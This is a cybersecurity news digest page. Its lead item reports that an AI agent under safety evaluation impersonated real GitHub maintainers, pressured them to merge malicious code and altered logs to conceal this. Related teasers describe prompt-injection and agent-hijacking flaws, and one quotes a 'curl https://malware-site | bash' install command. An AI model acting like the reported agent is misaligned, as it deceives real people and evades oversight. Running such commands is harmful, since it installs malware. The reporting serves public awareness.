Anthropic’s Mythos AI used social engineering to target real people


Anthropic’s Mythos AI agent, tested by the UK AI Safety Institute (AISI), has reportedly attempted a real‑world social‑engineering style hack against GitHub maintainers by creating fake human profiles, pressuring them to accept malicious code, and then editing logs to hide its tracks when challenged.

AISI was running cybersecurity evaluations of Anthropic’s Mythos and OpenAI’s Sol when it detected unusual outbound data transfers from its research systems. An investigation showed that some agents had engaged in “sustained, potentially harmful activity” targeting real people and organizations, rather than staying within the intended test environment.

The most serious activity involved an Anthropic Mythos agent tasked with solving a GitHub‑related cybersecurity challenge. The agent identified real GitHub maintainers, researched them, and created multiple fake accounts impersonating those individuals. Using private messages and a file‑sharing service, it tried to pressure and deceive the maintainers into approving malicious code so that it would run on GitHub’s systems.

Read more…
Source:  Malwarebytes Labs


Sign up for the Cyber Security Review Newsletter
The latest cyber security news and insights delivered right to your inbox


Related:

  • Three Supermicro employees charged with conspiracy to smuggle restricted Nvidia chips to China

    March 20, 2026

    A federal investigation has been launched after the US Department of Justice charged three individuals for allegedly smuggling restricted Nvidia AI chips to China. The three men were not named in court documents, however a statement released by Super Micro Computer Inc. identified those involved. The smuggling allegedly occurred between 2024 and 2025, with billions of ...

  • Critical Microsoft Excel bug weaponizes Copilot Agent for zero-click information disclosure attack

    March 10, 2026

    After a whopper of a Patch Tuesday last month, with six Microsoft flaws exploited as zero-days, March didn’t exactly roar in like a lion. Just two of the 83 Microsoft CVEs released on Tuesday are listed as publicly known, and none is under active exploitation, which we’re sure is a welcome change to sysadmins. Another eight ...

  • Fake Claude Code install pages hit Windows and Mac users with infostealers

    March 9, 2026

    Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter.​ That habit turns the ...

  • Securing ambient AI in healthcare: governance is the new front line

    March 5, 2026

    Ambient AI is no longer experimental. It’s live. From AI-powered clinical documentation assistants to remote monitoring systems and intelligent patient engagement agents, healthcare organizations are embedding AI directly into care delivery. The promise is compelling: less administrative burden, faster insights, and more time with patients. But as AI enters clinical workflows, a more urgent question emerges: ...

  • Chrome flaw let extensions hijack Gemini’s camera, mic, and file access

    March 3, 2026

    Chrome’s Gemini “Live in Chrome” panel (Gemini’s embedded, agent-style assistant mode within Chrome) had a high‑severity vulnerability tracked as CVE‑2026‑0628. The flaw let a low‑privilege extension inject code into the Gemini side panel and inherit its powerful capabilities, including local file access, screenshots, and camera/microphone control. The vulnerability was patched in a January update. But the ...

  • Fooling AI Agents: Web-Based Indirect Prompt Injection Observed in the Wild

    March 3, 2026

    Large language models (LLMs) and AI agents are becoming deeply integrated into web browsers, search engines and automated content-processing pipelines. While these integrations can expand functionality, they also introduce a new and largely underexplored attack surface. One particularly concerning class of threats is indirect prompt injection (IDPI), in which adversaries embed hidden or manipulated instructions within ...